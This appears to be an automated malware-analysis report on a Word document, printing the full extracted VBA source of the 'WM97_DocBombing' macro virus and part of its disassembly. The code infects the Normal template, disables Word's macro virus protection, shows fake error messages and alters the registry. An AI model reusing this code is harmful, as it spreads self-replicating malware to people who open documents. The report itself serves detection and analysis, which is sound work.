Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro. The macro, named 'WM97_DocBombing', is designed to infect the Normal.dot template. Upon execution, it displays a fake error message to the user, likely as a distraction or to mask its malicious activity. The presence of the 'Document_Open' macro and the infection of the Normal.dot template strongly indicate a malicious intent.
Heuristics (3)
- ClamAV: Doc.Trojan.DB-1 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.DB-1
- VBA macros detected (medium, 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro (auto-executes when the document is opened)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10979 bytes |

SHA-256: 327630388c09aaf66603b53a065c526fc05e777bdcb7ece2f32d8fb7ded42f39
Detection: ClamAV: Doc.Trojan.DB-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "WM97_DocBombing"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
Private Sub Document_Open()
On Error Resume Next
Dim ToInfectNT As Boolean, ToInfectAD As Boolean
Dim Bcl As Integer, NTCL As Integer, ADCL As Integer
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NT.CodeModule.CountOfLines
ADCL = AD.CodeModule.CountOfLines
Options.SaveNormalPrompt = False
Options.VirusProtection = False
If (NT.Name) <> "WM97_DocBombing" Then
NT.CodeModule.DeleteLines 1, NTCL
ToInfectNT = True
NT.Name = "WM97_DocBombing"
End If
If (AD.Name) <> "WM97_DocBombing" Then
AD.CodeModule.DeleteLines 1, ADCL
ToInfectAD = True
AD.Name = "WM97_DocBombing"
End If
If (ToInfectNT = True And ToInfectAD = False) Then
NT.CodeModule.InsertLines 1, "Private Sub Document_Close()"
For Bcl = 2 To ADCL
NT.CodeModule.InsertLines Bcl, AD.CodeModule.Lines(Bcl, 1)
Next Bcl
NT.CodeModule.InsertLines Bcl + 1, "Public Sub ViewVBCode()"
NT.CodeModule.InsertLines Bcl + 2, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Visual Basic" + """"
NT.CodeModule.InsertLines Bcl + 3, "End Sub"
NT.CodeModule.InsertLines Bcl + 4, "Public Sub ToolsMacro()"
NT.CodeModule.InsertLines Bcl + 5, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Word" + """"
NT.CodeModule.InsertLines Bcl + 6, "End Sub"
End If
If (ToInfectNT = False And ToInfectAD = True) Then
AD.CodeModule.InsertLines 1, "Private Sub Document_Open()"
For Bcl = 2 To NTCL - 6
AD.CodeModule.InsertLines Bcl, NT.CodeModule.Lines(Bcl, 1)
Next Bcl
End If
If (Day(Now()) >= 6) Then
If (Month(Now()) >= 11) Then
If (Year(Now()) >= 2000) Then
ActiveDocument.Windows.Application.Caption = "WM97_DocBombing virii !!"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Vortex!!"
With ActiveDocument.Comments(1)
.Author = "WM97_DocBombing"
.Initial = "WM97_DB"
End With
For Bcl = 0 To 20
Documents.Add
Next Bcl
End If
End If
End If
'*** WM97_DocBombing Macro Virus ver1.2.03 by Vortex***
'Dedicated to Condor (we are all with you, Kevin !!!)
'Thanks also to Kwyjibo for the excellent 'Melissa' macro
'Enjoy !!
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
' Processing file: /opt/analyzer/scan_staging/bee9236f15524de8b38a6faeb2c486b6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/WM97_DocBombing - 6214 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' Dim
' VarDefn ToInfectNT (As Boolean)
' VarDefn ToInfectAD (As Boolean)
' Line #4:
' Dim
' VarDefn Bcl (As Integer)
' VarDefn NTCL (As Integer)
' VarDefn ADCL (As Integer)
' Line #5:
' Line #6:
' SetStmt
' LitDI2 0x0001
... (truncated)